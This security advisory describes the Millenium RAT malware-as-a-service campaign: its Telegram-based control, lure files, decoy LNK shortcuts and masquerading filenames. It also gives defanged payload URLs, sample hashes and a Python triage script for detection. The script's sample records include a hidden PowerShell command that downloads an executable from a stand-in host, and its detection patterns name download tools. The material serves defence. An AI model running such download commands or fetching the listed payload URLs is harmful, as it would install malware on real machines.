Published on June 29, 2026

Millenium RAT Rewritten in C++ Infects 62,000+ Devices Across 160 Countries

Severity

High

Detail

Security researchers have identified a large-scale malware campaign involving Millenium RAT that has infected more than 62,000 devices across over 160 countries. More than 39,000 of those infections occurred during the first quarter of 2026, indicating that the campaign is rapidly expanding. Initially identified by CYFIRMA in 2023, the malware has evolved into version 4, a complete rewrite from .NET to native C++ that significantly improves its stealth and removes its dependency on the .NET Framework.

According to Group-IB, the malware is operated by a threat cluster known as Y2K Operators and is offered as a Malware-as-a-Service (MaaS) platform. The malware is advertised on underground forums and GitHub under the developer alias “shinyenigma”, making it accessible to cybercriminals at a low subscription cost.

Millenium RAT targets Windows systems and communicates with attackers through the Telegram Bot API, eliminating the need for traditional command-and-control infrastructure. The malware loads encrypted configuration data containing Telegram bot credentials, persistence settings, and keylogger configurations, protected using Base64 encoding combined with a custom XOR algorithm to evade detection.

How?

The Y2K Operators rely heavily on social engineering rather than software vulnerabilities to infect victims. Threat actors distribute Millenium RAT disguised as cracked software, cryptocurrency utilities, credit card generators, hacking toolkits, and gaming-related applications to persuade users to execute malicious files.

In some campaigns, legitimate hacking tools and existing RAT builders are trojanized with Millenium RAT before being redistributed. Another observed technique involves malicious Windows shortcut (.LNK) files disguised as PDF documents. When opened, the shortcut silently executes PowerShell to download the RAT while displaying a decoy PDF to avoid raising suspicion. After installation, the malware disguises itself using legitimate-looking filenames such as svchost[.]exe, MsEdgeUpdate[.]exe, and Microsoft Antivirus[.]exe, making detection more difficult. All communications with the operators are conducted through Telegram, allowing malicious traffic to blend in with legitimate HTTPS communications.
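The three behaviours described above (an explorer-launched PowerShell download from a decoy shortcut, a well-known filename running from the wrong directory, and the Telegram Bot API being contacted by something other than a browser or the Telegram client) can be turned into simple host-triage rules. The following Python is an added example, not code from the advisory or from Group-IB or CYFIRMA; the log records are constructed, and their field names (event, image, parent_image, cmdline, dest) are assumptions rather than any product's real schema.

```python
import re

# Added example, not from the advisory: the record fields (event, image, parent_image, cmdline, dest) are assumed.

# Filenames the RAT was seen using, with the directory a genuine copy would live in
# (None: no canonical location, so flag it wherever it runs).
MASQUERADE = {
    "svchost.exe": r"c:\windows\system32\svchost.exe",
    "msedgeupdate.exe": None,
    "microsoft antivirus.exe": None,
}
DOWNLOAD_RE = re.compile(r"invoke-webrequest|iwr|downloadstring|downloadfile|curl", re.I)
EXPECTED_TELEGRAM_CLIENTS = {"chrome.exe", "msedge.exe", "firefox.exe", "telegram.exe"}

def check(ev: dict) -> list[str]:
    """Return the names of the rules that fire on one log record."""
    hits = []
    image = ev.get("image", "").lower()
    name = image.rsplit("\\", 1)[-1]
    parent = ev.get("parent_image", "").lower()
    cmd = ev.get("cmdline", "").lower()
    is_proc = ev.get("event") == "process"
    # 1. Decoy-LNK chain: explorer.exe starts PowerShell, which fetches a payload.
    if is_proc and "powershell" in name and parent.endswith("explorer.exe") and DOWNLOAD_RE.search(cmd):
        hits.append("lnk_powershell_download")
    # 2. Filename masquerade: a known decoy name running from the wrong directory.
    if is_proc and name in MASQUERADE and image != MASQUERADE[name]:
        hits.append("masquerade_filename")
    # 3. Telegram Bot API reached by something other than a browser or the Telegram client.
    if ev.get("event") == "network" and ev.get("dest", "").lower() == "api.telegram.org" \
            and name not in EXPECTED_TELEGRAM_CLIENTS:
        hits.append("telegram_botapi_from_unexpected_process")
    return hits

def triage(events: list[dict]) -> list[tuple[int, list[str]]]:
    """Return (record index, rule names) for every record that trips at least one rule."""
    return [(i, r) for i, e in enumerate(events) if (r := check(e))]

# Constructed sample records: the first three mimic the chain described above, the last one is benign.
SAMPLE = [
    {"event": "process", "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent_image": r"C:\Windows\explorer.exe",
     "cmdline": r"powershell -w hidden -c iwr http://example.invalid/x.exe -OutFile $env:TEMP\x.exe"},
    {"event": "process", "image": r"C:\Users\bob\AppData\Roaming\svchost.exe",
     "parent_image": r"C:\Users\bob\AppData\Local\Temp\x.exe", "cmdline": "svchost.exe"},
    {"event": "network", "image": r"C:\Users\bob\AppData\Roaming\svchost.exe", "dest": "api.telegram.org"},
    {"event": "process", "image": r"C:\Windows\System32\svchost.exe",
     "parent_image": r"C:\Windows\System32\services.exe", "cmdline": "svchost.exe -k netsvcs"},
]
```

Running `triage(SAMPLE)` flags the first three records (one rule each) and leaves the genuine services.exe-spawned svchost.exe untouched; the Telegram rule is a hunting lead rather than a verdict, since legitimate automation may also use the Bot API.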

Indicators of Compromise (IoCs)

The following are examples of IoCs associated with the Millenium RAT campaign:

Type | Indicator | Description
URL | hxxp://158[.]94[.]208[.]168/files/8514679081/DRTjyu7[.]exe | Millenium RAT payload delivery URL.
URL | hxxps://www[.]thesnapchatmodapk[.]com/update1[.]exe | Millenium RAT payload delivery URL.
Domain | 75877[.]mcdir[.]me | Domain used to proxy Telegram Bot API requests.
Domain | blackhatusa[.]com | Distribution domain for multiple RAT payloads.
SHA-256 | 1d699a46339626db299548e32ed3a77eec267840c3de39b49caf38b88aeb150d | Millenium RAT sample.
SHA-256 | 2267d05dbd5e30c6dfcdde25731280dd755e689faa684bd21cfbef5281fd3e86 | Millenium RAT sample.

Mitigation & Recommendations

The following mitigation measures are recommended to reduce the risk of compromise from the Millenium RAT campaign:

  • Treat unexpected User Account Control (UAC) administrative prompts with high suspicion.
  • Avoid downloading utilities, game mods, or files from unverified or third-party web repositories.
  • Restrict daily operational tasks to non-administrator accounts.
  • Keep operating systems and applications updated with the latest security patches.
  • Enforce multi-factor authentication across accounts to shield backend resources if credentials are stolen.

Source

https://cybersecuritynews.com/millenium-rat-rewritten-in-c/